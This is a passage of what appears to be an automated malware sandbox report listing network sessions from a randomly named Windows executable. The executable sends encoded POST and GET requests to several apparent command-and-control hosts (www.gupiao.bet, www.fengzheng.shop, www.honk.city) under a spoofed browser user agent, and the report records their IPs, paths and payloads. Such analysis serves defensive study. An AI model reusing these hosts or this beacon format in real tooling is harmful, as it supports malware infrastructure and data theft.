                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 76 67 31 2f 6d 41 32 7a 77 55 5a 75 33 6b 4d 35 42 5a 36 34 67 33 59 72 4f 33 39 68 59 68 39 46 64 58 53 55 33 2f 33 34 4a 46 74 50 6a 77 6c 69 52 72 53 61 58 4b 70 46 75 6e 43 4b 76 59 2f 37 72 6a 57 6e 48 78 31 53 4b 51 5a 74 38 79 71 6d 57 54 61 72 70 30 54 6b 66 4a 32 67 66 6a 42 2f 4d 70 2b 71 4c 39 42 51 56 62 65 50 4f 41 70 69 52 44 6c 67 73 57 31 6d 66 33 70 47 31 61 56 4c 46 65 63 67 37 59 62 34 44 49 56 7a 31 70 36 55 51 50 55 67 32 67 73 36 52 4a 7a 2b 4b 62 78 72 75 4a 66 61 6d 4f 66 70 4d 76 38 58 4c 6a 41 69 55 30 68 35 4b 72 61 63 5a 45 36 74 66 33 43 54 6f 30 4e 67 49 64 45 73 30 6c 39 65 4a 62 43 42 69 57 52 33 44 2b 42 6a 70 4b 30 33 2b 6e 34 64 34 54 4e 57 70 4b 76 74 57 65 72 51 41 6d 45 59 6f 7a 65 72 45 4d 44 74 49 4b 48 6d 74 62 2b 42 4f 42 47 54 56 72 4b 4d 6c 31 34 41 5a 6d 6a 61 34 63 56 42 35 73 4a 67 64 75 6f 57 6b 72 4a 54 58 30 43 59 6b 35 43 4f 66 70 55 64 51 68 72 39 55 59 57 36 2f 46 51 76 55 45 43 45 4e 58 39 2b 7a [TRUNCATED]
                                                                                Data Ascii: ynlT=o0J+MpKGqHuAvg1/mA2zwUZu3kM5BZ64g3YrO39hYh9FdXSU3/34JFtPjwliRrSaXKpFunCKvY/7rjWnHx1SKQZt8yqmWTarp0TkfJ2gfjB/Mp+qL9BQVbePOApiRDlgsW1mf3pG1aVLFecg7Yb4DIVz1p6UQPUg2gs6RJz+KbxruJfamOfpMv8XLjAiU0h5KracZE6tf3CTo0NgIdEs0l9eJbCBiWR3D+BjpK03+n4d4TNWpKvtWerQAmEYozerEMDtIKHmtb+BOBGTVrKMl14AZmja4cVB5sJgduoWkrJTX0CYk5COfpUdQhr9UYW6/FQvUECENX9+zNBPYSNbfJPVrQ8LKV3q4hhNweDn5DT1R62JX7zz1AQwOWXUUIXVPdM+Is2yi02sw+4bI0yFUmvw/w4ZZQEr0XisygZCkUoqSkOijs+K1mKt/EL8vhrt2TRIEIEBbzbYHkkL2KmAFS9HfXC6UQxCjDzdPL1cz50jniLIgQKpzoE6Xrhkb3ykYJ/T6Mfk19+8HY2dvn4Tnx1Y/vU0dmLUa5Ia15v1SL6T9GWSU7SuzruG/KOuuDMzOXwXKp0ITYV17UJVAIkqyK1wtTR+PdrDvNHq9YixZhSQbIoeL0Ec/WYuG8obxhtJhfvCwP7+raAE0bMw9LRjBNvROonmViLmxsMcc8+xhDqpNy2KauPdHMAikhVqnKlsFQ1s5hltCH14hNIYoSDg/xZUnDFe2NUIleuHwdti3n8SMYOKtl6dyNwbji0vjJW4WXuhEMf9Xup61g77dyjtoCNrz6NfKVCV3PPtLiCnJUuHfljMG/RuW3f+F3geZwb2jMnKwQHzGVqHoSCHzhzilFBfKT7KV4RxErM/6KF5rJuc1VFkPMHdzw/fl5SFJez1n9ZCiJ7JSDNCMEYdzlH5lULOMkJxuA9LUtF/TEc0Th5xwIVLVyOj0WT2IZla0Q3pbY7PBO34xSCMhgDM5WtrvL+TVT+S+7SK68sX8Z9rrVrbXUX [TRUNCATED]
                                                                                Nov 26, 2024 09:30:26.306643009 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:25 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1102
                                                                                x-request-id: 2e53d0cf-d8c7-47af-8c4e-7ddf13c54fb0
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==
                                                                                set-cookie: parking_session=2e53d0cf-d8c7-47af-8c4e-7ddf13c54fb0; expires=Tue, 26 Nov 2024 08:45:26 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 5a 70 53 32 38 65 36 63 30 58 37 30 33 4d 49 6b 2b 54 67 49 49 65 52 35 36 39 61 79 4e 57 57 49 33 4a 51 49 74 6f 72 34 72 4b 6f 66 6d 67 71 72 74 6c 6b 35 2f 74 75 65 4f 36 4f 37 37 6d 6f 78 78 6a 76 51 77 53 66 6f 69 61 4f 35 43 73 53 6a 4b 4e 4a 79 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:26.306710005 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmU1M2QwY2YtZDhjNy00N2FmLThjNGUtN2RkZjEzYzU0ZmIwIiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.849753199.59.243.227806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:27.840614080 CET449OUTGET /c8xp/?ynlT=l2hePdG2jE2F6AlCjwqyhHlkxUQzRJGliE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCi0s4BCVbW+K50/dKIaUUEtFLragHdQcQoqOBThjHGNr3A==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:30:28.971760035 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:28 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1490
                                                                                x-request-id: 0b166bab-855f-431d-bd78-39364681f1bc
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ja4iNubnXNuPcSJhefkC7a/wnprK8kJESW5vN1QLwGtc1TZLdx5BTndx+QnIhVOWpF6LPk0BAv6MLpF5ZNRzjw==
                                                                                set-cookie: parking_session=0b166bab-855f-431d-bd78-39364681f1bc; expires=Tue, 26 Nov 2024 08:45:28 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 61 34 69 4e 75 62 6e 58 4e 75 50 63 53 4a 68 65 66 6b 43 37 61 2f 77 6e 70 72 4b 38 6b 4a 45 53 57 35 76 4e 31 51 4c 77 47 74 63 31 54 5a 4c 64 78 35 42 54 6e 64 78 2b 51 6e 49 68 56 4f 57 70 46 36 4c 50 6b 30 42 41 76 36 4d 4c 70 46 35 5a 4e 52 7a 6a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ja4iNubnXNuPcSJhefkC7a/wnprK8kJESW5vN1QLwGtc1TZLdx5BTndx+QnIhVOWpF6LPk0BAv6MLpF5ZNRzjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:28.971817970 CET943INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGIxNjZiYWItODU1Zi00MzFkLWJkNzgtMzkzNjQ2ODFmMWJjIiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.84975413.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:34.935585022 CET701OUTPOST /t3a1/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.gupiao.bet
                                                                                Referer: http://www.gupiao.bet/t3a1/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 76 79 42 63 58 30 2f 50 69 53 6d 73 4d 38 58 6a 74 54 77 36 55 61 62 66 6b 53 53 41 51 35 4a 52 6d 46 31 78 6b 63 79 53 49 39 42 2f 59 37 79 63 75 56 53 30 31 5a 75 53 4c 71 42 6b 5a 43 30 39 2b 6e 70 35 6f 54 32 57 41 69 59 37 35 6b 67 65 55 44 75 38 69 65 7a 75 48 68 63 37 6a 45 6f 33 31 6c 78 70 70 66 6f 6f 50 6d 57 72 74 49 7a 4f 67 62 5a 6b 50 57 66 45 70 4a 43 59 62 59 51 43 38 54 74 73 52 4a 2b 37 4b 43 66 69 5a 55 4f 62 4d 32 50 64 6f 38 30 42 58 52 6e 48 6e 33 5a 48 47 42 75 41 42 2f 4e 38 39 76 6f 71 75 38 4f 43 4c 68 55 57 41 47 41 67 49 76 67 3d
                                                                                Data Ascii: ynlT=oNwV17kuuQ7IvyBcX0/PiSmsM8XjtTw6UabfkSSAQ5JRmF1xkcySI9B/Y7ycuVS01ZuSLqBkZC09+np5oT2WAiY75kgeUDu8iezuHhc7jEo31lxppfooPmWrtIzOgbZkPWfEpJCYbYQC8TtsRJ+7KCfiZUObM2Pdo80BXRnHn3ZHGBuAB/N89voqu8OCLhUWAGAgIvg=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.84975513.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:37.594918013 CET721OUTPOST /t3a1/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.gupiao.bet
                                                                                Referer: http://www.gupiao.bet/t3a1/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 70 53 78 63 45 6a 54 50 6b 79 6d 76 41 63 58 6a 6b 7a 77 2b 55 61 6e 66 6b 54 58 46 51 4c 64 52 6c 67 78 78 6e 65 61 53 4c 39 42 2f 54 62 79 64 7a 6c 53 2f 31 5a 71 61 4c 71 39 6b 5a 43 51 39 2b 69 56 35 6f 6b 43 58 41 79 59 35 2f 6b 67 63 51 44 75 38 69 65 7a 75 48 68 4a 51 6a 45 77 33 30 57 35 70 70 2b 6f 72 54 57 57 73 36 34 7a 4f 6b 62 5a 67 50 57 66 36 70 49 66 31 62 61 59 43 38 53 64 73 57 59 2b 34 46 43 66 6b 57 30 50 4e 48 44 32 51 6c 63 30 68 58 79 4c 79 73 31 51 36 48 33 66 71 62 64 46 36 2b 76 41 42 75 2f 6d 30 4f 57 4a 2b 61 6c 51 51 57 34 30 77 6a 44 7a 57 44 46 33 70 50 45 33 38 74 67 5a 78 7a 35 68 59
                                                                                Data Ascii: ynlT=oNwV17kuuQ7IpSxcEjTPkymvAcXjkzw+UanfkTXFQLdRlgxxneaSL9B/TbydzlS/1ZqaLq9kZCQ9+iV5okCXAyY5/kgcQDu8iezuHhJQjEw30W5pp+orTWWs64zOkbZgPWf6pIf1baYC8SdsWY+4FCfkW0PNHD2Qlc0hXyLys1Q6H3fqbdF6+vABu/m0OWJ+alQQW40wjDzWDF3pPE38tgZxz5hY


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.84975613.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:40.393663883 CET1738OUTPOST /t3a1/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.gupiao.bet
                                                                                Referer: http://www.gupiao.bet/t3a1/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 70 53 78 63 45 6a 54 50 6b 79 6d 76 41 63 58 6a 6b 7a 77 2b 55 61 6e 66 6b 54 58 46 51 4c 6c 52 6c 57 4e 78 6c 2f 61 53 4b 39 42 2f 61 37 79 59 7a 6c 53 69 31 64 47 57 4c 71 77 5a 5a 45 55 39 2f 41 74 35 67 31 43 58 4b 79 59 35 79 45 67 66 55 44 75 74 69 65 6a 69 48 68 5a 51 6a 45 77 33 30 51 64 70 2b 2f 6f 72 41 47 57 72 74 49 7a 4b 67 62 5a 59 50 57 48 71 70 49 71 49 62 4b 34 43 38 79 4e 73 51 71 6d 34 4d 43 66 6d 58 30 50 46 48 44 7a 51 6c 63 6f 44 58 7a 2b 70 73 32 77 36 4c 54 71 78 47 76 42 48 38 73 67 4b 75 66 69 45 51 6d 5a 36 53 7a 49 35 57 49 59 54 30 32 6a 56 55 6b 7a 5a 47 30 2b 6f 77 48 4a 35 6a 73 4a 4d 67 2f 67 43 33 46 38 35 49 48 38 50 49 53 57 74 2f 61 2f 4a 66 31 4c 6e 75 6c 78 64 42 37 53 76 61 76 4c 54 38 36 48 56 50 59 62 34 78 59 4a 76 43 45 31 32 2f 69 4b 2f 43 77 45 75 62 61 55 50 38 6c 70 39 44 67 6a 4c 70 77 41 54 70 31 34 36 78 6a 4a 6c 4e 79 49 34 68 6e 64 48 69 52 32 78 41 56 62 58 6c 46 36 77 4d 69 33 67 70 6e 45 72 64 [TRUNCATED]
                                                                                Data Ascii: ynlT=oNwV17kuuQ7IpSxcEjTPkymvAcXjkzw+UanfkTXFQLlRlWNxl/aSK9B/a7yYzlSi1dGWLqwZZEU9/At5g1CXKyY5yEgfUDutiejiHhZQjEw30Qdp+/orAGWrtIzKgbZYPWHqpIqIbK4C8yNsQqm4MCfmX0PFHDzQlcoDXz+ps2w6LTqxGvBH8sgKufiEQmZ6SzI5WIYT02jVUkzZG0+owHJ5jsJMg/gC3F85IH8PISWt/a/Jf1LnulxdB7SvavLT86HVPYb4xYJvCE12/iK/CwEubaUP8lp9DgjLpwATp146xjJlNyI4hndHiR2xAVbXlF6wMi3gpnErdDzMnGLDz8AHpkxy+ULasCa0uKZk8JX7y22t88NqJhSrHtSGevRlSKbfHCvoMZL9MTME5dISOmPHdL49+dVEiaYFkX/Co3B4kih4YeOX4AgptGxSpuK1P1VlyBelUiosmSdIfRHf8et+Tj+kH9nOJgiIv/rWO8EYM73KmfSYwmmUhPcjszY7MLTBGK0qBTIKwrojqXyEgGnK158Idh0jM9Qe8reU9Oq2eSnNwSDL2fExuYcZ9fzZiS3yiMZXVAhABRUM020a4Gt66sewaGuTER2LUtGiW265xgvnnynaHz301rSX7ZbKl6zjG79zq/u0hmPM+6I3hO0UI0unMMK3QgPDjzTu3yilk0JYv/Ujg18EjIvMNADaPXNRoSFc6nYKVAeBxtZnOl1bWpeI38WyGz7xSY74yK2S5x4GNrRdvRUHr8yWWlX4cJBqTN5jIMZFwELEM6ggZeGYvKyEBZ2KClqVJ7SDsKijvrIBVIfRQtlPMmM7X/iogMZ5UmqB8SV/I7kIuCQEiKrTVjnfvYX8X0EX5SQvf7vcqomjhycwWWwP4B8yrQz2AYfvKV1k9ZxxUHu47C1jCNfv5YBnctJUZTXZ0rWQ1lTzs2ifbUTAgx8KVDb9bSj1FuBrJ2S0sLoRzf3AFEru66ch7nHe3KsiJlzFUoVFShTehtr [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.84975713.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:43.267810106 CET450OUTGET /t3a1/?ynlT=lPY12PoV4Qu/vhxaDGrG8k6ABtrDoTA3UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE3V94n9AcHyNncbJEzMiuzMO81JxmNo9FVK575fLvIMTSQ==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.gupiao.bet
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:30:44.357635975 CET409INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 26 Nov 2024 08:30:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 269
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 6e 6c 54 3d 6c 50 59 31 32 50 6f 56 34 51 75 2f 76 68 78 61 44 47 72 47 38 6b 36 41 42 74 72 44 6f 54 41 33 55 62 4f 51 6a 53 76 4e 52 62 30 6d 76 47 42 48 69 74 75 52 48 72 4e 66 54 39 2f 78 70 69 61 35 78 59 43 77 4a 4c 31 6f 66 6b 55 49 37 48 4a 35 74 33 37 75 45 33 56 39 34 6e 39 41 63 48 79 4e 6e 63 62 4a 45 7a 4d 69 75 7a 4d 4f 38 31 4a 78 6d 4e 6f 39 46 56 4b 35 37 35 66 4c 76 49 4d 54 53 51 3d 3d 26 42 5a 63 70 3d 46 78 4c 78 73 4e 43 78 33 78 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ynlT=lPY12PoV4Qu/vhxaDGrG8k6ABtrDoTA3UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE3V94n9AcHyNncbJEzMiuzMO81JxmNo9FVK575fLvIMTSQ==&BZcp=FxLxsNCx3xt"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.849758185.26.237.170806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:49.893357992 CET713OUTPOST /plc2/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.fengzheng.shop
                                                                                Referer: http://www.fengzheng.shop/plc2/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 73 45 35 64 54 45 63 47 72 67 68 55 4d 73 6f 4a 63 49 4d 38 7a 74 30 44 36 6d 62 4d 55 6f 69 2b 6a 6f 59 2f 4e 67 33 43 34 78 6e 52 4c 64 78 72 75 73 52 65 72 65 45 33 2b 64 32 36 4e 65 4a 31 62 6c 52 78 37 62 79 57 5a 42 61 57 37 4f 30 36 68 31 55 76 38 43 39 49 65 41 78 54 66 4b 32 62 4f 2f 71 36 65 54 46 7a 41 76 50 70 69 63 42 30 63 31 41 37 42 64 30 61 4f 33 6c 73 55 61 38 45 30 74 32 54 46 6a 68 4d 4f 75 4a 63 4f 4d 65 30 64 55 57 35 34 39 43 42 33 71 57 2b 42 72 52 55 44 53 35 53 68 6d 33 55 65 47 52 64 61 43 62 54 39 7a 52 71 30 5a 63 6a 76 37 67 3d
                                                                                Data Ascii: ynlT=hhhof8OBXTnfsE5dTEcGrghUMsoJcIM8zt0D6mbMUoi+joY/Ng3C4xnRLdxrusRereE3+d26NeJ1blRx7byWZBaW7O06h1Uv8C9IeAxTfK2bO/q6eTFzAvPpicB0c1A7Bd0aO3lsUa8E0t2TFjhMOuJcOMe0dUW549CB3qW+BrRUDS5Shm3UeGRdaCbT9zRq0Zcjv7g=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.849759185.26.237.170806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:52.564970970 CET733OUTPOST /plc2/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.fengzheng.shop
                                                                                Referer: http://www.fengzheng.shop/plc2/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
